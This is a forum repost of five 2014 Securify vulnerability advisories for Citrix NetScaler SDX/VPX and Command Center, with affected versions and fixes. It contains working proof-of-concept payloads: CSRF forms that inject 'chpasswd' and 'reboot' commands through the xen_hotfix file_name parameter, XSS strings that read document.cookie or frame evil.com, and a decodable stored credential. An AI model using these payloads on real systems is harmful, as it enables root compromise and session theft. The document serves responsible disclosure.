Aerosol Posted March 20, 2015 Report Posted March 20, 2015 Citrix NITRO SDK Command Injection------------------------------------------------------------------------Command injection vulnerability in Citrix NITRO SDK xen_hotfix page------------------------------------------------------------------------Han Sahin, August 2014------------------------------------------------------------------------Abstract------------------------------------------------------------------------Securify discovered a command injection vulnerability in xen_hotfix pageof the NITRO SDK. The attacker-supplied command is executed withelevated privileges (nsroot). This issue can be used to compromise ofthe entire Citrix SDX appliance and all underling application's anddata.------------------------------------------------------------------------Tested version------------------------------------------------------------------------This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9, otherversions may also be affected.------------------------------------------------------------------------Fix------------------------------------------------------------------------Citrix reports that this vulnerability is fixed in NetScaler 10.5 build52.3nc.------------------------------------------------------------------------Details------------------------------------------------------------------------https://www.securify.nl/advisory/SFY20140806/command_injection_vulnerability_in_citrix_nitro_sdk_xen_hotfix_page.htmlThis vulberability exists because the file_name parameter submitted to the /nitro/v1/config/xen_hotfix page used in a shell command without proper input validation/sanitation, introducing a command execution vulnerability. The shell command is executed with elevated privileges (nsroot), which allows attackers to run arbitrary commands with these privileges. This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data.The following proof of concept can be used to exploit this issue;<html> <body> <form action="https://SDXHOSTIP/nitro/v1/config/xen_hotfix" method="POST"> <input type="hidden" name="object" value="{"params":{"action":"start"},"xen_hotfix":[{"file_name":"../../etc/passwd;echo nsroot:Securify|chpasswd;"}]}" /> <input type="submit" value="Submit request" /> </form> <script>document.forms[0].submit();</script> </body></html>POST /nitro/v1/config/xen_hotfix HTTP/1.1-----------------------------------------object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"../../etc/passwd;reboot;"}]}orobject={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"%3a"../../etc/passwd;echo nsroot:han|chpasswd;"}]}Due to insufficient Cross-Site Request Forgery protection, it is possible to exploit this issue by tricking a logged in admin user into visiting a specially crafted web page.Citrx Command Center Advent JMX Servlet Accessible------------------------------------------------------------------------Advent JMX Servlet of Citrx Command Center is accessible tounauthenticated users------------------------------------------------------------------------Han Sahin, August 2014------------------------------------------------------------------------Abstract------------------------------------------------------------------------It was discovered that the Advent JMX Servlet of Citrix Command Centeris accessible to unauthenticated users. This issue can be abused byattackers to comprise the entire application.------------------------------------------------------------------------Tested version------------------------------------------------------------------------This issue was discovered in Citrix Command Center 5.1 build 33.3(including patch CC_SP_5.2_40_1.exe), other versions may also bevulnerable.------------------------------------------------------------------------Fix------------------------------------------------------------------------Citrix reports that this vulnerability is fixed in Command Center 5.2build 42.7, which can be downloaded from the following location (loginrequired).https://www.citrix.com/downloads/command-center/product-software/command-center-52-427.htmlCitrix assigned BUG0494204 to this issue.------------------------------------------------------------------------Details------------------------------------------------------------------------https://www.securify.nl/advisory/SFY20140804/advent_jmx_servlet_of_citrx_command_center_is_accessible_to_unauthenticated_users.htmlThe Advent JMX Servlet is exposed at /servlets/Jmx_dynamic. Functionality exposed by the JMX Servlet can be invoked by an unauthenticated attacker, which can lead to unauthorized remote code execution and comprise of the entire application and services. In addition, this interface is also affected by Cross-Site Scripting. For example:https://<target>:8443/servlets/Jmx_dynamic?fname=<script>alert(document.cookie);</script>Citrix NetScaler VPX Cross Site Scripting------------------------------------------------------------------------Citrix NetScaler VPX help pages are vulnerable to Cross-Site Scripting------------------------------------------------------------------------Han Sahin, August 2014------------------------------------------------------------------------Abstract------------------------------------------------------------------------It was discovered that the help pages of Citrix VPX are vulnerable toCross-Site Scripting. This issue allows attackers to perform a widevariety of actions, such as stealing the victim's session token or logincredentials, performing arbitrary actions on the victim's behalf, andlogging their keystrokes.------------------------------------------------------------------------Tested version------------------------------------------------------------------------This issue was discovered in Citrix NetScaler VPX NSVPX-ESX-10.5-50.10,other versions may also be vulnerable.------------------------------------------------------------------------Fix------------------------------------------------------------------------Citrix reports that this vulnerability is fixed in NetScaler 10.5 build52.8nc.------------------------------------------------------------------------Details------------------------------------------------------------------------https://www.securify.nl/advisory/SFY20140807/citrix_netscaler_vpx_help_pages_are_vulnerable_to_cross_site_scripting.htmlThis issue exists because the value of the searchQuery URL parameter is assigned client-side to contentDiv.innerHTML (DOM-based Cross-Site Scripting), for example:https://<target>/help/rt/large_search.html?searchQuery=<h1>Reset your password below:<h1><iframe src='http://www.evil.com'/>&type=ctxTVTricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.Citrix NITRO SDK xen_hotfix Cross Site Scripting------------------------------------------------------------------------Citrix NITRO SDK xen_hotfix page is vulnerable to Cross-Site Scripting------------------------------------------------------------------------Han Sahin, August 2014------------------------------------------------------------------------Abstract------------------------------------------------------------------------A Cross-Site Scripting vulnerability was found in the xen_hotfix page ofthe Citrix NITRO SDK. This issue allows attackers to perform a widevariety of actions, such as stealing the victim's session token or logincredentials, performing arbitrary actions on the victim's behalf, andlogging their keystrokes.------------------------------------------------------------------------Tested version------------------------------------------------------------------------This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9;,other versions may also be affected.------------------------------------------------------------------------Fix------------------------------------------------------------------------Citrix reports that this vulnerability is fixed in NetScaler 10.5 build52.3nc.------------------------------------------------------------------------Details------------------------------------------------------------------------https://www.securify.nl/advisory/SFY20140805/citrix_nitro_sdk_xen_hotfix_page_is_vulnerable_to_cross_site_scripting.htmlThe Cross-Site Scripting vulnerability exists because the REST interface returns an incorrect Content-Type HTTP response header. The interfaces states that the content returned is HTML, while in fact it is JSON. Due to this it is possible to cause browser to render the JSON response as HTML. User input included in the JSON response is JSON encoded, not HTML encoded. Due to this, it is possible to inject arbitrary HTML content in the JSON data that will be rendered and executed by the browser.This issue is exploitable on the /nitro/v1/config/xen_hotfix page through the file_name parameter. Below is an example HTTP response in which this issue is demonstrated.HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8Date: Wed, 16 Jul 2014 13:54:53 GMT{ "errorcode": 16004, "message": "Failed to obtain uuid for hotfix cmd.xsupdate<img src=a onerror=alert(document.cookie)>, error string = 'xe patch-upload file-name=\"\/root\/cmd.xsupdate<img src=a onerror=alert(document.cookie)>\"\r\nOperation failed. Error: file '\/root\/cmd.xsupdate<img src=a onerror=alert(document.cookie)>' does not exist\r\n\u001b]0;root@NetScaler-sdx:~\u0007[root@NetScaler-sdx ~]#'", "severity": "ERROR" }Proof of concept:<html> <body> <form id="form" method="POST" action="https://<target>/nitro/v1/config/xen_hotfix" enctype="text/plain"> <input type="hidden" name="object" value='{"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a [{"file_name"%3a" cmd.xsupdate<img%20src%3da%20onerror%3dalert(document.cookie)>"}]}' /> <input type="submit" value="submit"> </form> <script> document.forms[0].submit(); </script> </body></html>Citrix Command Center Configuration Disclosure------------------------------------------------------------------------Citrix Command Center allows downloading of configuration files------------------------------------------------------------------------Han Sahin, August 2014------------------------------------------------------------------------Abstract------------------------------------------------------------------------It was discovered that Citrix Command Center stores configuration filescontaining credentials of managed devices within a folder accessiblethrough the web server. Unauthenticated attackers can download anyconfiguration file stored in this folder, decode passwords stored inthese files, and gain privileged access to devices managed by CommandCenter.------------------------------------------------------------------------Tested version------------------------------------------------------------------------This issue was discovered in Citrix Command Center 5.1 build 33.3(including patch CC_SP_5.2_40_1.exe), other versions may also bevulnerable.------------------------------------------------------------------------Fix------------------------------------------------------------------------Citrix reports that this vulnerability is fixed in Command Center 5.2build 42.7, which can be downloaded from the following location (loginrequired).https://www.citrix.com/downloads/command-center/product-software/command-center-52-427.htmlCitrix assigned BUG0493933 to this issue.------------------------------------------------------------------------Details------------------------------------------------------------------------https://www.securify.nl/advisory/SFY20140802/citrix_command_center_allows_downloading_of_configuration_files.htmlConfiguration files can be downloaded from the conf web folder. Below is an example of a configuration file that can be obtained this way.https://<target>:8443/conf/securitydbData.xmlThis files contains encoded passwords, for example:<DATA ownername="NULL" password="C70A0eE9os9T2z" username="root"/>These passwords can be decoded trivially. The algorithm used can be found in the JAR file NmsServerClasses.jar. For example the encoded password C70A0eE9os9T2z decodes to SECURIFY123. The credentials stored in these files can than be used to gain privileged access to devices managed by Command Center. Quote